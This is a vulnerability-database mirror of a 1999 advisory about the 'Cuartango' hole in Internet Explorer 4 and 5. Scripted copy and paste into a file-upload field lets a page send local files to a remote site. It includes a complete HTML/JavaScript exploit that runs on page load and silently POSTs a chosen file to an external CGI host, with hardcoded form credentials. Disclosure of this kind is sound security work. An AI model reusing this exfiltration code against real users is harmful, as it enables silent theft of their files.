Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

cuartango-msie.txt

🗓️ 17 Aug 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

Security hole in Microsoft Internet Explorer allows file transfer to malicious sites via scripting.

Code
`Cuartango security Hole   
  
http://pages.whowhere.com/computers/cuartangojc/cuartangoh1.html  
  
Affected software  
Microsoft Internet Explorer 4  
Microsoft Internet Explorer 5 Preview  
  
Risks  
Major : Your computer files can be sent to a WEB site by a malicious Script (if the file name is known).  
  
Technical description  
There is an input form field used to tranfer files from the browsing computer to a WEB site this  
input field is HTML coded as :  
  
<input type="file" name="filename" size="30">  
  
Theoretically this input field can be filled only by the user by clicking a "Browse" button or  
typing the file name.  
In order to avoid a security hole, script files are not allowed to modify the value of this input   
field, the sentence bellow will not work (very clever MS Explorer programmers) :  
  
document.forms[0].filename = "C:\config.sys";  
  
What Microsoft programmers forgot is that "copy" and "paste" commands are possible in scripting with  
Internet Explorer 4 and they did not protect the file input field against this operation.  
Tha attack is the evident :  
1- Create a second form with a hidden field named "T1" containing the file name you want to hack.  
2- In the HTML Body Onload event fire an script :  
  
<body onload="getfile()">  
  
function getfile()  
{  
document.forms[1].T1.select();  
document.execCommand("copy");  
document.forms[0].filename.select();  
document.execCommand("paste");  
document.forms[0].submit();  
}  
  
The result is that the file is POSTED to the malicious WEB site defined in the form action property.  
  
  
----------exploit code example----------  
  
<html>  
<script language="JavaScript">  
  
function getfile()  
{  
document.forms[1].T1.select();  
document.execCommand("copy");  
document.forms[0].filename.select();  
document.execCommand("paste");  
window.open("cuartangoh3.html");  
document.forms[0].submit();  
}  
  
</script>  
  
  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">  
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">  
<title>Cuartango Hole 2</title>  
</head>  
  
<body onload="getfile()">  
  
<form enctype="multipart/form-data" method="post"  
action="http://www.angelfire.com/cgi-bin/bedit">  
<input type="hidden" name="storage" value="ab"><input type="hidden" name="hpd"  
value="cuartangojc"><input type="hidden" name="password" value="asisea"><p><strong>I am  
transfering your file</strong> <input type="file" name="filename" size="30"> <strong>to my  
web site </strong>&nbsp; </p>  
</form>  
  
<form method="POST">  
<input type="hidden" name="T1" value="/test.txt"><p>&nbsp;</p>  
</form>  
  
</body>  
</html>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4
cuartango security holemicrosoft internet explorerfile transfer vulnerabilitymalicious script exploitinput field attack
19